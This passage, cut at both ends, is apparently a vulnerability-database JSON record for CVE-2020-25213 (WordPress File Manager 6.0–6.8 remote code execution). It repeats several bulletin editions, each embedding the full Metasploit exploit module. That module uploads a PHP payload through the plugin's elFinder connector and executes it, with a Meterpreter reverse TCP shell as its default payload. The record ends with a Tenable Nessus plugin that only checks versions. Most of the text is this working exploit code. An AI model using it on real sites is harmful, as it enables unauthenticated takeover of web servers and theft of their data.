boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-11-04] #", "category": "", "verified": false}, "lastseen": "2021-11-03T22:21:55", "differentElements": ["sourceData"], "edition": 61}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "29c8cb2d1efc110b1aa5420e9e2352d7", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-11-05T04:12:29", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "githubexploit", "idList": ["6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED", "21A5FEEE-9C4D-52D3-BCE6-7EABF0888631"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-11-05T04:12:29", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-11-05T04:12:29", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-11-05] #", "category": "", "verified": false}, "lastseen": "2021-11-05T04:12:29", "differentElements": ["sourceData"], "edition": 62}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "beeed30ee5d62d83e0f07e12633b4f7e", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-11-08T03:46:34", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "githubexploit", "idList": ["6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED", "21A5FEEE-9C4D-52D3-BCE6-7EABF0888631"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-11-08T03:46:34", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-11-08T03:46:34", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\n 'Description' => %q{\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\n ],\n 'References' =>\n [\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\n [ 'CVE', '2020-25213' ]\n ],\n 'Platform' => [ 'php' ],\n 'Privileged' => false,\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [\n 'WordPress File Manager 6.0-6.8',\n {\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\n 'DefaultTarget' => 0\n )\n )\n register_options(\n [\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\n ]\n )\n end\n\n def check\n return CheckCode::Unknown unless wordpress_and_online?\n\n # check the plugin version from readme\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\n end\n\n def exploit\n # base path to File Manager plugin\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\n # filename of the file to be uploaded/created\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\n register_file_for_cleanup(filename)\n\n case datastore['COMMAND']\n when 'upload'\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\n when 'mkfile+put'\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\n end\n\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\n # execute the payload\n send_request_cgi('uri' => normalize_uri(payload_uri))\n end\n\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\n filename = opts['filename']\n\n # prep for exploit\n post_data = Rex::MIME::Message.new\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\n\n case elfinder_cmd\n when 'upload'\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\n when 'mkfile'\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\n when 'put'\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\n end\n\n res = send_request_cgi(\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\n 'method' => 'POST',\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n )\n\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\n end\nend\n", "category": "", "verified": false}, "lastseen": "2021-11-08T03:46:34", "differentElements": ["category", "reporter", "verified"], "edition": 63}], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "githubexploit", "idList": ["21A5FEEE-9C4D-52D3-BCE6-7EABF0888631", "6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-12-02T23:20:57", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-12-02T23:20:57", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\n 'Description' => %q{\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\n ],\n 'References' =>\n [\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\n [ 'CVE', '2020-25213' ]\n ],\n 'Platform' => [ 'php' ],\n 'Privileged' => false,\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [\n 'WordPress File Manager 6.0-6.8',\n {\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\n 'DefaultTarget' => 0\n )\n )\n register_options(\n [\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\n ]\n )\n end\n\n def check\n return CheckCode::Unknown unless wordpress_and_online?\n\n # check the plugin version from readme\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\n end\n\n def exploit\n # base path to File Manager plugin\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\n # filename of the file to be uploaded/created\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\n register_file_for_cleanup(filename)\n\n case datastore['COMMAND']\n when 'upload'\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\n when 'mkfile+put'\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\n end\n\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\n # execute the payload\n send_request_cgi('uri' => normalize_uri(payload_uri))\n end\n\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\n filename = opts['filename']\n\n # prep for exploit\n post_data = Rex::MIME::Message.new\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\n\n case elfinder_cmd\n when 'upload'\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\n when 'mkfile'\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\n when 'put'\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\n end\n\n res = send_request_cgi(\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\n 'method' => 'POST',\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n )\n\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\n end\nend\n", "category": "remote exploits", "verified": true, "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}], "nessus": [{"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "d663eb84abc134b38e29e67f2908bb28", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to 6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An unauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php file, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-09-04T00:00:00", "modified": "2020-11-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213", "http://www.nessus.org/u?53de38d7"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-10-05T12:17:25", "history": [{"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "7cacebfeb6b0db89c0afd494a6161823b48db4eba4cd67cf6b920660227f236b", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the ", "published": "2020-09-04T00:00:00", "modified": "2020-09-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 10.0, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?53de38d7"], "cvelist": [], "immutableFields": [], "lastseen": "2020-09-09T05:50:38", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2020-09-09T05:50:38", "references": [], "rev": 2}, "score": {"modified": "2020-09-09T05:50:38", "rev": 2, "value": 0.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"No CVE available for this vulnerability.\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-09-09T05:50:38", "differentElements": ["description"], "edition": 1}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "658d239da22b345ad9a7bada25b3fe74b05e87cd05245d6c3d6fdf7e0d281d4b", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.", "published": "2020-09-04T00:00:00", "modified": "2020-09-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 10.0, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?53de38d7"], "cvelist": [], "immutableFields": [], "lastseen": "2020-09-14T19:32:17", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"modified": "2020-09-14T19:32:17", "references": [], "rev": 2}, "score": {"modified": "2020-09-14T19:32:17", "rev": 2, "value": -0.0, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 